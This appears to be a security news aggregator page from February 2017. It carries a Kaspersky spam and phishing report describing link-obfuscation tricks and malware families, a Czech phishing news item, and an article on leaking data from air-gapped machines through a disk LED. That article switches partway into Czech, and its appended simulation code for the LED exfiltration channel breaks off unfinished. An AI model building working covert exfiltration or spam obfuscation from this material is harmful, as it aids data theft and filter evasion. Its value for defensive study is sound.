“I can confirm we (Chronopay) expect to be part of this case. In 2010 we provided the FSB and other important Russian agencies with evidence that at least one FSB employee, as well as several other people, were involved in treason,” Vrublevsky told Reuters, referring to his past allegations against Stoyanov and Mikhailov.

Just after the allegations, Vrublevsky was arrested and convicted on charges of organizing a cyber attack on a competitor, but now he is free on parole.

Vrublevsky added that a fourth person, Georgy Fomchenkov, a former FSB officer, had been arrested in the case.

“Public documents available online show Stoyanov and Fomchenkov both had appeals against their detention rejected by the Moscow District Military Court on Feb. 15. Two days later, Mikhailov lost an appeal at the same court, which often hears sensitive cases relating to state security.” added Reuters.


Spam and phishing in 2016
26.2.2017 Kaspersky Spam

The year in figures

According to Kaspersky Lab, in 2016:

The proportion of spam in email flows was 58.31%, which is 3.03 percentage points more than in 2015.
62.16% of spam emails were no more than 2 KB in size.
12.08% of spam was sent from the US.
Trojan.Win32.Bayrob was the most popular malware family distributed via email.
Germany (14.13%) was the country where email antivirus was triggered most often.
There were 154,957,897 instances of the Anti-Phishing system being triggered.
A total of 15.29% of unique users were attacked by phishers.
Brazil suffered the highest number of phishing attacks, with 27.61% of the global total.
47.48% of incidents triggering the heuristic component in the Anti-Phishing system targeted clients of various financial organizations.
World events in spam

In 2016, fraudulent spam exploited the theme of major sporting events: the European Football Championship, the Olympic Games in Brazil, as well as the upcoming World Cups in 2018 and 2022. Typically, spammers send out fake notifications of lottery wins linked to one of these events. The content of the fake messages wasn’t exactly very original: the lottery was supposedly held by an official organization and the recipient’s address was randomly selected from millions of other addresses. To get their prize, the recipient had to reply to the email and provide some personal information.

With these sport-themed emails, further details were often included in DOC, PDF or JPEG attachments that also contained graphic elements such as official emblems, event and sponsor logos. Messages that displayed the spam text directly in the body of the email were not very numerous. To add a bit of variety to their messages, spammers resorted to an old trick: they changed the text, the email addresses used for feedback, sender addresses, the attachment names, the size, etc. At the same time, emails with the same attachment could be found in our traps on numerous occasions over a period of several months.


In the fourth quarter of 2016, spammers turned their attention to the future World Cup tournaments scheduled for 2018 and 2022. Spam traffic often included fraudulent notifications of lottery wins exploiting this theme.


The football theme was also used in malicious spam. In particular, cybercriminals sent out fake notifications with scans taken from a website that publishes news about computer games and the world of football, apparently in an attempt to arouse interest among recipients. The attached ZIP archive included a JavaScript downloader detected by Kaspersky Lab as Trojan-Downloader.Script.Generic. This malware, in turn, downloaded other malicious software to the victim’s computer.


The subject of terrorism, which has remained an important global issue in recent years, was also exploited in spam mailings. Numerous so-called Nigerian letters were sent to users on behalf of both state organization employees and individuals. The details of the stories may have differed, but the senders’ intention was the same – to get the recipient’s attention with promises of large sums of money and make them join in a conversation. Nigerian letters exploiting the tense situation in Syria remained popular in 2016 and were actively used to trick users.


Malicious spam exploiting the theme of terrorism was less common. It was used to steal personal information, organize DDoS attacks and install additional malware on victims’ computers.


Email offers from Chinese factories

In the email traffic for 2016, we often came across messages from Chinese factories and plants advertising their products. These spammers offered both finished products as well as spare parts for a variety of different spheres.

The text of a typical spam message began with an impersonal greeting to the recipient, followed by the name and surname of the factory manager. Often, the email described the merits of the company, its achievements and types of certification. The products offered by the company were either listed in the email or sent at the request of the recipient. For greater clarity, some of the emails also contained pictures of the goods on offer. At the end of the message, there were contact details (phone, mobile phone and fax numbers, email address, various messengers). Sometimes the contact details were specified in the image attached to the email.


The authors of the emails were representatives of the manufacturers, but the sender addresses were registered with both free email services and the companies’ domain names. Sometimes the messages included a company website, if the company had one.

In many countries, there was a time when small and medium-sized businesses preferred to use spam to promote their products. But users began to view this kind of advertising as undesirable, anti-spam laws were introduced, and, most importantly, new, more targeted, convenient and less intrusive advertising platforms appeared, with social networking sites prominent among them. We can only presume why Chinese businesses have not followed this trend (given that China has passed its own anti-spam law, which is one of the strictest in the world). The fact is that social networks in China are mainly internal, with global giants such as Facebook not permitted. As a result, Chinese entrepreneurs have far fewer legal means of entering the international market.

A year of ransomware in spam

In 2016, we recorded a huge amount of malicious spam. In previous years, Fraud.gen was the program most often used in malicious attachments. It appears in the form of an HTML page and is designed to steal the victim’s credit card data. In 2016, the absolute leaders in spam were Trojan downloaders that download ransomware to the victim’s computer. The most popular were mass spam mailings sent out to infect user computers with the Locky encryptor. However, other ransomware such as Petya, Cryakl and Shade were also widespread.

The number of malicious programs began to increase in December 2015 and continued to grow in waves throughout the year. The sharp falls were mainly caused by the fact that cybercriminals temporarily disabled the Necurs botnet, responsible for the majority of spam spreading Locky. Once the botnet was up and running again, the cybercriminals changed the spam templates.

 

Quantity of malicious emails in spam, 2016

In 2016, the email antivirus was triggered 239,979,660 times on the computers of Kaspersky Lab users, which is four times more than the previous year.

Such extensive use of ransomware may be due to the availability of this sort of malware on the black market. Currently, cybercriminals can not only rent a botnet to send out spam but also connect to so-called Ransomware-as-a-Service. This means that the attacker may not be a hacker in the traditional sense, and may not even know how to code.

Malicious spam messages often imitated personal correspondence, prompting recipients to view attached documents under various pretexts. Cybercriminals also sent out fake bills, or receipt notifications or even messages from office equipment with scanned documents allegedly attached.

 

Both examples above contain an attachment in the form of a malicious file with a .wsf extension, detected by Kaspersky Lab as Trojan-Downloader.JS.Agent.myd. The malicious file is written in JavaScript and downloads a Locky encryptor modification to the victim’s machine.

 

This screenshot shows an attachment containing a malicious file with a .jse extension, detected by Kaspersky Lab as Trojan-Downloader.JS.Cryptoload.auk. This is yet another malicious file written in JavaScript that downloads a Locky encryptor modification to the victim’s machine.

Overall, a wide variety of malicious attachments were used. As a rule, these were archives containing programs written in Java and JavaScript (JS files, JAR, WSF, WRN, and others), but there were also office documents with macros (DOC, DOCX, XLS, RTF) as well as classic executable files (EXE). Sometimes rare archive formats such as CAB were used.

When launched, ransomware programs encrypt the data on a user’s computer and demand a ransom (usually in bitcoins via the Tor network). More details about these programs can be found in our report Kaspersky Security Bulletin 2016. The ransomware revolution.

Spammer tricks

Adding ‘noise’ to text

To make each email unique, spammers insert random sequences of characters in their messages that are invisible to the user. This trick is not new, but spammers continue to use it, perfecting their methods. Below we describe the most popular tricks of 2016 used by spammers to add ‘noise’. All the examples below are taken from real-life spam messages.

Small letters and/or white text.

 

The easiest and oldest trick: the text is written in a white font (the hexadecimal colour code ffffff, which is white and therefore invisible on a white background).

 

In this example, random sequences of letters in very small white print are placed between the normal-sized words of the sentence “You have received a £500”.

Text that is not displayed.

 

With the attribute style="display: none;", text in an email is simply not displayed. In normal use this attribute is used, for example, in rough drafts. In spam, elements carrying this attribute and containing random text are inserted in messages in large quantities, and if the anti-spam filter is not set up to process them, the real text of the email practically disappears behind the noise.

The same effect can be achieved by inserting a random sequence written with a font size of zero:

 

Placing text outside the screen range.

Yet another way to make junk text invisible to the user is to write it in standard font, but insert it in parts of the email that are beyond the screen frame (to the extreme left or right, or below the main part):

 

Using tags that by default are not visible to users.

Sometimes random text is inserted in tags that are not designed to display text to the user. Typically, comment tags are used, though there are other examples:

 

The content of the <noscript> tag is only displayed by mail clients that do not support scripting or have it disabled, so most users will not see it.

Using tags to add noise

Rather than using random sequences of characters that are made invisible, the text is sometimes obfuscated with tags that have no meaning and cannot be interpreted by the mail client:

 

The number of these sorts of tags in some spam emails can be in the hundreds.

Sometimes a random sequence is inserted inside a tag as an attribute value, rather than between tags:

 

Such an attribute will, of course, not be interpreted either, and it does not appear in the email the user sees.

Masking links

There may be numerous ways of altering text in an email, but when it comes to URLs in spam messages, the situation is different. There can be lots of URLs in a single mass mailing (even reaching into the thousands), but they are subject to more limitations, as spammers have to pay for the purchase of each domain. However, attackers have come up with different techniques to make each link unique while also ensuring it opens correctly when clicked.

Obfuscation of domains using the UTF range:

In last year’s report we described some spammer tricks that involved different ways of expressing domain names and IP addresses. The trend for writing domain names using symbols from different UTF ranges and using different numerical systems for IP addresses continued in 2016.

Especially popular with spammers were mathematical alphanumeric symbols. For example:

 

Domain written using mathematical bold script.

 

Domain written using mathematical monospace small.

This Unicode block is intended for mathematical notation and is not meant to be used in plain text or hyperlinks.

Mixing encodings

The above trick was diversified by mixing encodings: spammers use the Latin alphabet in Unicode to write some of the domain characters, while the rest are written using characters from special URL-encoded ranges.

 

The domain from the example above is first changed to:

 

and then to server119.bullten.org.

URL shortening services with added noise

In addition to the various ways of writing the actual spammer site, from time to time cybercriminals use another trick to avoid mentioning the site directly in an email. This involves the use of URL shortening services and redirects. In 2016, spammers also resorted to a variety of other methods to add noise to each URL.

They inserted characters, slashes and dots between the URL shortening service and the actual link identifier (the meaningful part is marked in bold; the rest is noise):

 

Sometimes comment tags end up there:

 

To deceive filters further, the names of different, usually well-known, sites are inserted in the noise part:

 

All these parts will be dropped when the link is clicked.

Yet another way to obfuscate a link is to add non-existent parameters to the end of the link:

 

Everything that comes after the question mark in the link is not part of the address of the resource itself; these characters are query parameters. The parameters can carry a variety of information: for example, an unsubscribe link often contains the email address that needs to be entered in the unsubscribe form. However, URL shortening services, like many other sites, do not require or accept any parameters, so this part of the URL is simply dropped during the redirect process. Spammers take advantage of this and insert random sequences of parameters. In this particular case, the .pdf extension is added to the end of the parameters. This is not done to confuse the filters but rather the user, who is likely to think the link leads to a PDF file.

Prefixes

As well as parameters that can be added to the end of a link, noise elements can also be added to the beginning. These elements may include symbols that are ignored by the link interpreter when a redirect occurs, for example:

 

(In this example, in addition to the noise at the beginning of the link and nonexistent parameters at the end, the link itself is an IP address written partially in octal and partially in hexadecimal encoding.)

The most common technique for adding noise at the beginning of a link is to use the @ symbol. Text placed before the @ symbol and the domain was originally meant to identify the user to the site (something that is rarely used these days). For sites that do not require identification, everything that comes before @ is simply ignored by the browser.

The symbol is useful for spammers because it allows them not only to add noise to the link but also to make it look more trustworthy to the user by specifying a well-known site before the @ symbol.

 

Masked redirects

Redirects have long been used by spammers to hide the main domain. We have already written about this in some detail. In 2016, the redirect methods used were not that diverse, but links with redirects were also obfuscated. The methods used were the same as those used with URL shortening services: the @ symbol, parameters and additional characters.

Cybercriminals often used several techniques at once – concealing and obfuscating the original link:

 

In the example below, the name of the site used to distract the user’s attention comes before the @ symbol, followed by the redirect to the URL shortening service (which is also just noise with several @ symbols), and it is only from this part that the user will get to the spammer’s site.
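A filter cannot match blacklists against links written this way unless it first reverses the masking tricks described in the sections above: mathematical alphanumeric symbols in the domain, percent-encoded domain characters, noise before the @ symbol, parameters after the question mark, and IP addresses written in octal, hexadecimal or decimal form. The following canonicaliser is an added example, not code from the report; all hosts and paths in it are constructed samples, and it uses only the Python standard library.

```python
"""Canonicalise obfuscated spam URLs before filtering (added example, not from the report)."""
import unicodedata
from urllib.parse import unquote, urlsplit

IP_CHARS = set("0123456789abcdefx.")


def numeric_host_to_ipv4(host):
    """Decode inet_aton-style hosts ("0x7f.0.0.1", "0177.0.0.1", "2130706433").

    Returns dotted-decimal text, or None if the host is not a numeric form.
    """
    if not host or not set(host.lower()) <= IP_CHARS:
        return None
    parts = host.lower().split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        try:
            if part.startswith("0x"):
                values.append(int(part[2:], 16))   # hexadecimal component
            elif len(part) > 1 and part[0] == "0":
                values.append(int(part, 8))        # leading zero: octal component
            else:
                values.append(int(part, 10))
        except ValueError:
            return None
    *lead, last = values
    width = 4 - len(lead)                           # bytes filled by the last component
    if any(not 0 <= v <= 255 for v in lead) or not 0 <= last < 256 ** width:
        return None
    number = 0
    for v in lead:
        number = (number << 8) | v
    number = (number << (8 * width)) | last
    return ".".join(str((number >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url):
    """Return the host a browser would actually connect to, in plain ASCII form."""
    # NFKC folds mathematical bold/monospace letters back to ordinary ASCII letters.
    folded = unicodedata.normalize("NFKC", url.strip())
    parts = urlsplit(folded)
    # .hostname drops userinfo (everything before the last "@") and the port.
    host = parts.hostname or ""
    host = unquote(host).rstrip(".").lower()        # undo %-encoding inside the domain
    return numeric_host_to_ipv4(host) or host


def canonical_url(url):
    """scheme://host/path with the noise removed. The query string is dropped
    because, as the report notes, shortening and redirect services ignore it."""
    parts = urlsplit(unicodedata.normalize("NFKC", url.strip()))
    path = unquote(parts.path) or "/"
    return f"{parts.scheme.lower()}://{canonical_host(url)}{path}"


def math_bold(text):
    """Write a-z with Mathematical Bold Small letters (U+1D41A onwards), as in the
    report's example, to build a test input; other characters are left unchanged."""
    return "".join(chr(0x1D41A + ord(c) - ord("a")) if "a" <= c <= "z" else c
                   for c in text)


if __name__ == "__main__":
    samples = [                                     # constructed, not real spam links
        "http://www.example.com@0x7f.0.0.1/offer?x=1&y=2.pdf",
        "http://" + math_bold("example.com") + "/offer",
        "http://ex%61mple.com/",
        "http://trusted.example@@@0177.0.0.1/p",
        "http://2130706433/",
    ]
    for sample in samples:
        print(canonical_url(sample))
```

Compare blacklists and reputation lookups against the canonical form rather than the raw link text, and treat a link whose raw host differs from its canonical host as a signal in its own right.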

 

Statistics

Proportion of spam in email traffic

In 2016, the proportion of spam in email traffic was 58.31%, which is 3.03 percentage points higher than the previous year.

 

The proportion of spam in email traffic, 2016

The lowest volume – 54.61% – was registered in February of 2016. After that, the proportion of spam grew steadily and reached a peak by the end of the year – 61.66% in November.

Interestingly, the last time there was an annual increase in the proportion of spam in email traffic was eight years ago. Since then, the percentage of spam has fallen continuously from its peak of 85.2% in 2009, to 55.28% in 2015. We believe this was due to legitimate small and medium-sized businesses gradually phasing out their use of spam, turning instead to legal advertising platforms.

 

The proportion of spam in global email traffic, 2009-2016

This downward trend may now have come to a halt because all those who wanted to or could refrain from using spammer services have, for the most part, already done so. This slight growth is the result of a sharp increase in spam containing malicious attachments.

Sources of spam by country

 

Sources of spam by country, 2016

In 2016, the top three sources of spam saw some changes: India climbed to third place with 10.15% due to a substantial growth in the volume of spam distributed (+7.19 p.p.). Such a dramatic increase may have been caused by botnets being organized in the region. Vietnam (10.32%) added 4.19 p.p. to its share and also moved up the rankings to second place. The US (12.08%) remained the clear leader despite a decrease of 3.08 p.p.

China’s share (4.66%) fell by 1.46 p.p., though it remained in fourth. Following close behind were two Latin American countries – Mexico (4.40%) and Brazil (4.01%). Russia (3.53%), among the top three in 2015, ranked seventh in 2016 after seeing a 2.62 p.p. decrease in its share of distributed spam.

France (3.39%, +0.22 p.p.) and Germany (3.21%, -1.03 p.p.) came eighth and ninth respectively. Turkey rounded off the Top 10 with a share of 2.29%, which is 0.34 p.p. more than in 2015.

The size of spam emails

The proportion of super-short spam emails (under 2 KB) dropped in 2016 and averaged 62.16%. This is 16.97 p.p. lower than in the previous year. The share of emails sized 2-5 KB also fell to 4.70%.

 

The size of spam emails in 2016

Meanwhile, the proportion of bigger emails increased considerably: 5-10 KB (6.15%), 10-20 KB (14.47%) and 20-50 KB (10.08%). This means that 2016 saw a trend towards fewer super-short spam emails and more emails of average size, from 5 to 50 KB. This was caused by a sharp increase in the proportion of spam with malicious attachments.

Malicious attachments in email

Malware families

 

TOP 10 malware families, 2016

In 2016, Trojan-Downloader.JS.Agent was the most widespread malware family. A typical representative of this family is an obfuscated JavaScript that uses the ADODB.Stream technology to download and run DLL, EXE and PDF files.

The Trojan-Downloader.VBS.Agent family occupied second place. They are VBS scripts utilizing ADODB.Stream technology to download ZIP archives and run software extracted from them.

In third place was Trojan-Downloader.MSWord.Agent. These malicious programs are DOC files with an embedded macro written in Visual Basic for Applications (VBA) that runs when the document is opened. The macro downloads another malicious file from a malicious site and runs it on the user’s computer.

Trojan-Downloader.JS.Cryptoload in fourth is a malware family whose representatives are an obfuscated JavaScript that downloads and runs encryptors.

Trojan.Win32.Bayrob rounded off the top five. The malicious programs from this Trojan family can download and run additional modules from the command server, as well as act as a proxy server. They are used to send out spam and steal personal data.

The Trojan-PSW.Win32.Fareit family came sixth. These malicious programs are designed to steal data, such as the credentials of FTP clients installed on the infected computer, login details for cloud storage, cookie files in browsers, email passwords. Fareit Trojans send the collected information to a malicious server. Some members of the family are able to download and run other malware.

The representatives of the Trojan-Downloader.JS.SLoad family in seventh are JS scripts that download and run other malware, mostly encryptors, on the victim computer.

Eighth place was taken by the Trojan.Java.Agent family. The malicious programs of this family are written in Java and have the JAR extension. These applications exploit vulnerabilities in Sun Java Runtime and can delete, block, modify or copy data, as well as download and run other malware.

Ninth place was occupied by Backdoor.Win32.Androm. This malware belongs to the family of Andromeda/Gamarue universal modular bots. Key features of these bots include the ability to download, store and run a malicious executable file, download and boot a malicious DLL (without saving it to disk), and update and delete itself. The bot functionality is extended with the help of plugins that can be uploaded by the intruders at any time.

Completing the Top 10 is the Worm.Win32.WBVB family. It includes executable files written in Visual Basic 6 (both in P-code and Native mode) that are not trusted by KSN.

Countries targeted by malicious mailshots

 

Distribution of email antivirus verdicts by country, 2016

In 2016, Germany (14.13%) remained in first place, despite a decrease of 4.93 p.p. Second and third were occupied by countries from the Asia-Pacific region – Japan (7.59%) and China (7.32%) – that were both outside the Top 10 in 2015.

Russia (5.6%), which was third in the previous year’s rating, came fourth in 2016 after the proportion of email antivirus detections in the country decreased by 0.7 p.p. It was followed by Italy (5.44%), the UK (5.17%) and Brazil (4.99%), which also dropped out of the top three.

The US came eighth, accounting for 4.03% of email antivirus detections, 0.89 p.p. less than the previous year.

Austria (2.35%) rounded off the Top 10 with an increase of 0.93 p.p.

Phishing

In 2016, the Anti-Phishing system was triggered 154,957,897 times on the computers of Kaspersky Lab users. That is 6,562,451 more times than in 2015. Overall, 15.29% of our users were targeted by phishers.

Hot topics of the year

Phishers, predictably, could not pass up the most high-profile event of the year – the Olympic Games in Brazil. The scammers targeted both the organizers of the Olympic Games and ordinary netizens who received fake notifications of lottery wins, allegedly organized by the Brazilian government and the Olympic Committee.

The US presidential elections were also seen as a good media event for phishers. This theme was exploited to mislead internet users not only in the US but also in other countries.

Yet another interesting theme that became the subject of a dedicated study was holiday season sales. Scammers took advantage of the busy shopping period in the run-up to the festive season by creating fake websites of payment systems and online stores and luring potential victims by promising generous discounts.

 

A fake online store page

In addition, the holiday season itself often becomes an excellent cover for the fraudsters. For example, they may ask users to update their account information prior to the New Year.

 

Phishing page exploiting the New Year theme in the subdomain name

Methods of distributing phishing content

In 2016, cybercriminals used all possible means to reach users and make them pass on confidential information or money: social networks, pop-up ads, banners, text messages.

Among the most interesting methods were scams involving services for buying and selling used items. Cybercriminals collected phone numbers from ads placed on these services and then sent text messages to the numbers offering something in exchange at an extra cost. The message contained a link allegedly leading to a photo of the item on offer, but which actually led the victim to a phishing page.

 

Fraudsters often exploit social networks, and it is not restricted to personal messages. In 2016, many Facebook users around the world, for instance, were prompted to install a malicious extension for their browser, when they were added to a post containing a phishing link that supposedly led to a provocative video.

 

In Europe, the most widespread malicious extension was ‘xic. graphics’. It was soon removed from an online store, but according to the available whois information, over 50 other domains were registered in the name of the owners of the domain that hosted the fake page. Those domains were probably used for similar purposes.

Phisher tricks: referrer cleaner services

In Q4 2016, scammers showed a tendency to use referrer cleaner services. The victim was sent an email on behalf of a well-known company containing a link whose parameters included the address of the victim.

 

After clicking the URL, the user is taken to a page that responds with an HTTP 302 redirect to the address of a referrer cleaner service, which in turn redirects them to the legitimate website of a bank.

http://nullrefer.com/?https://www.cartalis.it/cartalis/prepagata/index.jsp

This way the user does not know that they have received a phishing email, while the bank does not receive a phishing domain in its referrers. At the same time, the phishers get confirmation that the user clicked on the link, which means that in future they will be able to send them more phishing emails, for example, in order to steal credit card data. In this way, the attackers ‘cleanse’ their databases of unused email addresses and vigilant recipients. They also detect clients of the bank whose name was used in the emails, allowing them to make their mass mailings more targeted.

The geography of attacks

Top 10 countries by percentage of attacked users

Brazil had the highest proportion of users subjected to phishing attacks (27.61%), a 5.98 p.p. increase on the previous year.

 

The percentage of users on whose computers the Anti-Phishing system was triggered out of the total number of Kaspersky Lab users in the country, 2016

In Brazil, we see lots of attacks targeting users of banks and online stores, so it is not surprising that the country often leads in the rating of countries with the highest proportion of users subjected to phishing attacks.

Phishers often place fake pages on the servers of government bodies in Brazil. This is one of the methods used to prevent phishing URLs from ending up on blacklists. It also enhances the credibility in the eyes of the victim. In 2016, we registered 1,043 such cases.

 

Fake page on the gov.br domain

Top 10 countries by percentage of attacked users

Country               %
Brazil                27.61
China                 22.84
Australia             20.07
Japan                 19.16
Algeria               17.82
Russia                17.16
United Kingdom        16.64
Canada                16.03
United Arab Emirates  15.54
Saudi Arabia          15.39

China was second in this rating (22.84%). It didn’t make the Top 10 in 2015, but added 5.87 p.p. to its share in 2016. Australia (20.07%), which was seventh last year, came third following an increase of 2.39 p.p. Apart from Saudi Arabia (+4.9 p.p.), the shares of the other Top 10 countries barely changed.

The distribution of attacks by country

Russia (16.12%, +1.68 p.p.) topped the rating of countries where the Anti-Phishing system was triggered most often (out of the total number of Anti-Phishing system detections around the world in 2016).

 

Distribution of Anti-Phishing system component detections by country, 2016

As in 2015, Brazil (8.77%) came second behind Russia, although its growth was negligible. The US added 0.5 p.p. (8.01%), which was enough to push India (6.01%) down to fourth. The top five also included China (7.86%).

Organizations under attack

The statistics on organizations used in phishing attacks are based on the triggering of the heuristic component in the Anti-Phishing system. The heuristic component is triggered when a user tries to follow a link to a phishing page and there is no information about the page in Kaspersky Lab’s databases.

Organizations under attack by category

In the second half of 2016, the proportion of phishing attacks targeting customers of financial institutions increased significantly (44.16% in the first quarter vs 48.14% in Q4). We have been following this growth over the last few years: in 2014, the average figure for the year was 28.74%; in 2015, it was 34.33%; and it was 47.47% in 2016.

In 2016, we saw significant growth in the proportion of phishing attacks on organizations belonging to the ‘Banks’ category (25.76%, +8.31 p.p.). Of particular note was the increase in the percentage of targeted organizations in the ‘Online stores’ (10.17%, +1.09 p.p.) and ‘Payment systems’ (11.55%, +3.75 p.p.) categories.

 

Distribution of organizations subject to phishing attacks by category, 2016

At the same time, the share of the main categories decreased. For instance, the ‘Global Internet portals’ category (24.10%) lost 7.77 p.p. while the share of ‘Social networking sites’ (10.91%) fell by 5.49 p.p.

Overall, the priorities of the phishing scammers have not changed over the years. Attacks primarily exploit the names of popular brands, whose clients are numerous and likely to bring maximum financial profit.

Another priority is attacks that could lead to the acquisition of confidential information and, subsequently, money. For example, some portals from the ‘Global Internet portals’ category (Google, Yahoo!, Microsoft (live.com), etc.) use the same account to access multiple services. A successful phishing campaign can therefore give fraudsters access to several of the victim’s accounts.

 

Phishing page to attack Google users

Top 3 attacked organizations

Organization           % of detected phishing links
Yahoo!                 7.84
Facebook               7.13
Microsoft Corporation  6.98

Yahoo! (7.84%) again topped the ranking of organizations used by fraudsters to mask their attacks, although the proportion of Anti-Phishing system detections of fake pages mentioning this brand declined considerably in 2016 – by 6.86 p.p. (vs 10 p.p. in 2015). It is clear that the company is actively fighting phishing attacks, for example, by registering obfuscated domains in its own name (yshoogames.com, ypyahoo.com.cn, yhoonews.com, yhoooo.com, yayoo.com, yahou.com). However, phishers often place their content on legitimate sites (without the owners being aware of it) rather than create phishing domains.

 

Example of a web page using the Yahoo! brand

Second in popularity with the fraudsters was Facebook (7.13%). Over the year its share decreased by 2.38 p.p.

In 2016, we came across both classic phishing pages imitating the Facebook login page and various pages designed to steal data. One popular way of luring a victim is to promise them access to age-restricted content after entering their username and password, i.e., logging in to the system.

 

To increase the chances of hitting their target, mass phishing campaigns use the names of the most popular brands. Since these brands are often international, the attacks target users around the world. Naturally, phishing messages are written in many languages. One phisher trick was described in our report Spam and phishing in Q3 2016. By using information about the IP address of a potential victim, phishers determine the country in which they are located. Cybercriminals will then display pages in the language of the country that is identified.

Third place in our Top 3 was occupied by Microsoft (6.98%). Using this brand to hide their attacks, fraudsters often try to steal data from user accounts on the live.com portal. They tend to use pages imitating the login page of the company’s email service.

 

There are also other schemes, such as simulation of account verification:

 

Conclusions and forecasts

2016 saw a variety of changes in spam flows, with the increase in the number of malicious mass mailings containing ransomware being the most significant. These programs are readily available on the black market, and in 2017 the volume of malicious spam is unlikely to fall.

Spam became very popular with small and medium businesses in China in 2016. One possible reason for this is the Great Firewall of China, which makes it difficult for Chinese businesses to use legal international platforms for advertising.

Of all the techniques used by spammers in 2016, the various ways of adding noise to text and links with the help of HTML capabilities are worth noting. This is nothing new, but spammers are constantly coming up with new types of obfuscation, and they will obviously continue to do so in the future.

The proportion of spam in email traffic was 58.31%, which is 3.03 p.p. higher than in 2015. This was the first registered growth since 2009, and it was partly down to the surge in malicious spam.

For several years in a row, the number of fraudulent schemes targeting clients of financial institutions has been increasing, and we expect this trend to continue. The attacks are becoming more versatile: the fraudulent pages adapt to the user and display information in the local language as well as other relevant data.

The methods for distributing fraudulent pages have gone far beyond the scope of email. Cybercriminals are using all available means to contact potential victims: text messages, advertising or social networks. The latter are not only a good channel of communication but also a useful resource helping intruders gather information to carry out a more effective attack on users.


Fraudsters are after money. Every second they stage one attack on the internet

26.2.2017 Novinky/Security
They pose as bank employees, but just as readily as couriers from delivery companies. When luring their victims on the internet, cybercriminals are incredibly inventive. As a rule, they exploit people's inattention and fear. The goal of such phishing attacks is usually the same: money.
The term phishing can be translated as fishing, and the attackers really do behave like anglers. With this technique they patiently wait for their victims so they can lure them with some bait, for example a prize or cash.

From the gullible they then extract passwords, credit card numbers or other data. Users thus unwittingly help cybercriminals take over their account, or even allow money to be stolen through internet banking.

Such phishing attacks most often spread through unsolicited emails. Recently, however, cybercriminals have also been very fond of using various advertisements and social networks.

Fishing across the whole internet
At first glance it might seem that cybercriminals choose exactly whom they attack. The opposite is true. According to an analysis by the antivirus company Kaspersky Lab for 2016, published this week, an attack takes place every second. In other words, cybercriminals often do not target their attacks but try to spread them as widely as possible: they are literally fishing across the whole internet.

It is also evident that the attackers are primarily after money. "Compared with 2015, the number of financial phishing attacks in 2016 grew by 13.14 percentage points. Of all blocked phishing attacks, 47.48% therefore targeted finance," said representatives of the antivirus company.

Last year we registered some 155 million attempts to access various phishing pages.
representatives of the antivirus company Kaspersky Lab
The analysis also shows that users very often fall for such fishing attempts. "Last year, Kaspersky Lab's anti-phishing technologies registered almost 155 million user attempts to access various phishing pages. Of that number, nearly half of the heuristic detections involved access to financial phishing pages," the security experts noted.

"Their goal was to obtain valuable personal information from users, such as bank and credit account numbers, social security numbers or the username and password for internet banking. Cybercriminals wanted to use this information to steal the victims' money," states the final report summarizing the results of the study.

Most often, fraudsters pose as bankers in such attacks. "Every fourth attack (25.76%) used fake banking information or other content relating to banking matters, an increase of 8.31 percentage points compared with 2015. The share of phishing relating to payment systems rose by 11.55% (an increase of 3.75 percentage points on 2015), and the share of phishing in the e-shop area rose by 10.14% (an increase of 1.09 percentage points on 2015). The share of financial phishing detected on MacOS was 31.38%," concluded the antivirus company's representatives.

Caution is warranted
Users should therefore be very careful with various offers on the internet that, for example, promise a reward for using a new version of internet banking. It is advisable, for instance, to check directly with your bank whether such a promotion is really running.

It also pays to watch out for various competitions and notifications from shipping companies: in the past, cybercriminals have posed as couriers, for example. They sent users SMS messages promising the delivery of a package.

In reality, however, they were merely trying to make the gullible download a fraudulent application that activates when the user tries to launch internet banking. Users thus served their login details up to the fraudsters, literally on a silver platter.


A blinking LED can be abused to leak data

26.2.2017 SecurityWorld Hacking
Israeli researchers have found a way to hack a computer using the hard disk LED.

The seemingly harmless blinking indicator lights of desktop computers or servers can do serious damage. Israeli researchers have come up with a new way to break into a computer through them and get sensitive data out of it. They present their discovery in a video in which a hacked computer transmits data through an LED, which is read by a drone hovering nearby.

They developed the method to point out the vulnerability of so-called air-gapped devices, that is, systems or computers that for security reasons lack wireless technologies, or computers deliberately disconnected from the internet. These usually contain highly confidential information or are used to control critical infrastructure. In the past, however, their data has already been reached using, for example, the noise emitted by the computer's fan or disk, or with the help of emitted heat.

Nejnovější metoda k hacknutí využívá blikání LED diody hard disku aktivní v okamžicích, kdy na disku probíhá čtení nebo zápis dat. Výzkumníci zjistili, že za pomocí malwaru mohou diodu kontrolovat tak, aby blikáním vysílala binární signály, což podle nich stačí k přenosu až 4000 bitů za sekundu, zkrátka dost na to, aby z počítače získali hesla či šifrovací klíče bez toho, aby vzbudili jakékoliv podezření.

„Diody na disku blikají s takovou frekvencí, že si nikdo nemůže všimnout čehokoliv divného,“ uvedl vedoucí výzkumného týmu Mordechai Guri.

K přečtení vysílaného signálu pak je třeba už jen kamera nebo optický senzor, přičemž Izraelci tvrdí, že ho dokážou přijímat až ze vzdálenosti dvaceti metrů, klidně i zpoza oken budovy. S čočkami s náležitým zoomem pak tato vzdálenost může být ještě větší.

Uplatnit tento hack v praxi by však nejspíš nebylo snadné, vývojářům totiž zatím chybí to podstatné – malware, kterým by LED diodu ovládali, a hlavně by vždy tento malware do vytipovaného počítače potřebovali nějak dostat, což vzhledem k obvyklým důkladným ochranným opatřením u air gap systémů, bude klíčovým problémem. Výzkumníci zároveň férově zmínili jednoduché řešení, jak podobnému hacku předcházet. Diodu stačí přelepit páskou...
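The blinking-as-binary scheme described above, as an added example that is not the researchers' code: a simulated on-off-keyed channel in which the malware side keeps the disk busy (LED lit) for a "1" window and idle (LED dark) for a "0" window, while the camera side samples brightness several times per bit and recovers each bit by majority vote. The preamble, the one-byte length framing, the oversampling factor and the noise pattern are assumptions made for this simulation; the bit rate the researchers quote is not modelled.

```python
"""Simulated on-off-keyed (OOK) LED covert channel.

Added example, not the researchers' code. A '1' bit keeps the disk busy
(LED lit) for one bit window, a '0' bit keeps it idle (LED dark). The
receiver samples brightness SAMPLES_PER_BIT times per window, tries every
sample offset to find the alignment, and majority-votes each window.
Framing (preamble, one length byte, payload), oversampling factor and the
noise pattern are assumptions made for this simulation.
"""

PREAMBLE = [1, 0, 1, 0, 1, 1, 0, 0]   # assumed sync pattern
SAMPLES_PER_BIT = 5                    # assumed receiver oversampling


def bytes_to_bits(data: bytes) -> list:
    """MSB-first bit list for a byte string."""
    return [(b >> i) & 1 for b in data for i in range(7, -1, -1)]


def bits_to_bytes(bits) -> bytes:
    """Inverse of bytes_to_bits; a trailing partial byte is dropped."""
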